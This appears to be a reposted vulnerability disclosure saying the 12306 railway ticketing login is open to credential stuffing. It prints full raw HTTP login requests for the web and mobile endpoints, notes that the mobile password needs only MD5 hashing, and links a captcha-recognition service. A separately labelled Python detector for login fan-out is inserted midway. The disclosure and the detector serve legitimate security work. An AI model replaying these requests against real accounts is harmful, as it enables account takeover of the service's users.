12306 login interface can still be hit by credential-stuffing attacks (captcha can be recognized) - Honker EmPire For China official site - Powered by H.E.C

12306 login interface can still be hit by credential-stuffing attacks (captcha can be recognized)

admin | Vulnerability alert

Brief description:

Each account has a login threshold of 5 attempts per 20 minutes; the captcha can be machine-recognized; the mobile client has no captcha at all.

Detailed description:

The mobile client has no captcha



https://kyfw.12306.cn/otn/login/init

[screenshot: login.jpg]


Code:
POST /otn/login/loginAysnSuggest HTTP/1.1
Host: kyfw.12306.cn
Content-Length: 152
Accept: */*
Origin: https://kyfw.12306.cn
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.99 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: https://kyfw.12306.cn/otn/login/init
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4
Cookie: JSESSIONID=91FA1614F112D5178E44705FDF85E4D1; BIGipServerotn=1725497610.24610.0000; current_captcha_type=C
Connection: Keep-Alive

loginUserDTO.user_name=10000%40qq.com&userDTO.password=123456&randCode=wh6e&randCode_validate=&MTQwOTA5=ZGY5Y2ZjYjEyMjI2MWJiMg%3D%3D&myversion=undefined





The mobile client requires no captcha; the password only has to be MD5-hashed when submitted; the threshold window is 20 minutes.

Code:
POST /otsmobile/apps/services/api/MobileTicket/android/query HTTP/1.1
Host: mobile.12306.cn
Content-Length: 591
Origin: file://
Accept-Language: zh_CN
Authorization: {"morCustomRealm":"aDHgAUw92AQQCYjZyEX5TcAVgAncDZmQCAAUAewNzcgEoYAxMQjJrAEBBRWEWNX9AHnULd1w9cykTXj8xRxxxIlsxFUVPQmAfN0IlOi0iRRE7azdSPjVIIjVEGjIQNz46FVw8ZxZERQMeVSZoMF5nFU12Hk4xQ2ocGU4zYiJObDR3NSZPQCJJZEBtG2JBS3AyaF5EQgVGIU1IZ0VWBXdgTn1tCV89ajxgQDM5XyQ0PmVkVjRyBlc5Nm9oJEMSZnh2dkYcSjplfkd+NBx/GGhAWjFoFmEUZVNHLDFGKz5iaGtrYSVsEGZvdg=="}
X-Requested-With: XMLHttpRequest
x-wl-app-version: 2.0
x-wl-platform-version: 6.0.0
WL-Instance-Id: u76dbkg7kq364qrpfrp2oflm3f
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/javascript, text/html, application/xml, text/xml, */*
User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; zh-cn; GT-N7100 Build/JDQ39; CyanogenMod-0.9.9.7) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30/Worklight/6.0.0
Accept-Encoding: gzip,deflate
Accept-Charset: utf-8, iso-8859-1, utf-16, *;q=0.7
Cookie: BIGipServerworklight=3705078026.16420.0000; AlteonP=0a02eb040a02ebc5284cfdfd2378; JSESSIONID=0000D6oVUcQ2f3Uw70wtfc73C9v:196iqvou7; BIGipServernginxformobile=32178698.50215.0000
Connection: Keep-Alive

adapter=CARSMobileServiceAdapterV2&procedure=login&compressResponse=true&parameters=[{"baseDTO.os_type":"a","baseDTO.device_no":"53469c87548547e","baseDTO.mobile_no":"123444","baseDTO.time_str":"20150117212733","baseDTO.check_code":"170294cbd0ab3398d8ed39217170c9ad","baseDTO.version_no":"1.1","baseDTO.user_name":"10000@qq.com","password":"327bc4e22b649d47c4546a3ec93f376b"}]&__wl_deviceCtxVersion=-1&__wl_deviceCtxSession=30549131421501159027&isAjaxRequest=true&x=0.8806376396678388
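The per-account threshold the report describes (5 attempts per 20 minutes) never trips under credential stuffing, which tries one password against many different accounts from the same source. As an added example that is not part of the original report, the following Python detector evaluates both that per-account rule and the per-source account fan-out over constructed login-log lines; the log format, field names, the devA / 198.51.100.7 sources and the 8-account fan-out threshold are assumptions, not 12306's.

```python
# Added example (not from the report). Two sliding-window checks over login logs:
# attempts per account (the report's 5 per 20 min) and distinct accounts per source.
from collections import defaultdict
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=20)   # threshold window stated in the report
PER_ACCOUNT_LIMIT = 5            # attempts per account per window, per the report
PER_SOURCE_ACCOUNTS = 8          # distinct accounts per source per window (assumed)

# Constructed sample log: "<iso time> <client> src=<ip or device_no> user=<account>"
SAMPLE_LOG = (
    # one device, one attempt per account, 10 different accounts within 3 minutes
    "".join(f"2015-01-17T21:{27 + i // 4}:{(i % 4) * 15:02d} mobile src=devA user=u{i:02d}@example.com\n"
            for i in range(10))
    # a second source hitting a single account 6 times (the per-account case)
    + "".join(f"2015-01-17T21:3{i}:00 web src=198.51.100.7 user=victim@example.com\n"
              for i in range(6))
)

def parse(log_text):
    """Yield (time, seq, source, account) from the constructed log format."""
    for seq, line in enumerate(log_text.splitlines()):
        ts, _client, src, user = line.split()
        yield datetime.fromisoformat(ts), seq, src.split("=", 1)[1], user.split("=", 1)[1]

def windowed_max(events, key, value):
    """Max number of distinct value(ev) per key(ev) inside any WINDOW-long span."""
    by_key = defaultdict(list)
    for ev in sorted(events):          # sorted by time, then sequence number
        by_key[key(ev)].append(ev)
    result = {}
    for k, evs in by_key.items():
        best, start = 0, 0
        for end in range(len(evs)):
            while evs[end][0] - evs[start][0] > WINDOW:   # slide window start forward
                start += 1
            best = max(best, len({value(e) for e in evs[start:end + 1]}))
        result[k] = best
    return result

def analyze(log_text):
    """Accounts over the per-account limit, and sources spraying many accounts."""
    events = list(parse(log_text))
    attempts = windowed_max(events, key=lambda e: e[3], value=lambda e: e[1])  # seq = one attempt
    fanout = windowed_max(events, key=lambda e: e[2], value=lambda e: e[3])    # distinct accounts
    return {"throttled_accounts": {a: n for a, n in attempts.items() if n > PER_ACCOUNT_LIMIT},
            "stuffing_sources": {s: n for s, n in fanout.items() if n >= PER_SOURCE_ACCOUNTS}}
```

On the sample, only the per-source check catches devA: each of its ten accounts saw a single attempt, well under the per-account limit.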





Captcha recognition

Code:
http://www.80vul.com/yzm/v.php?url=http://static.wooyun.org/wooyun/upload/201501/1720224632ac157f9dd635bd901105790c35853f.jpg


[screenshots: 80v.jpg, 12306__0.jpg to 12306__5.jpg]

Proof of vulnerability:

# Recognition platform 1

[screenshot: sb1.png]



# Recognition platform 2

[screenshots: 12306__00.jpg to 12306__55.jpg]


Tags: credential stuffing
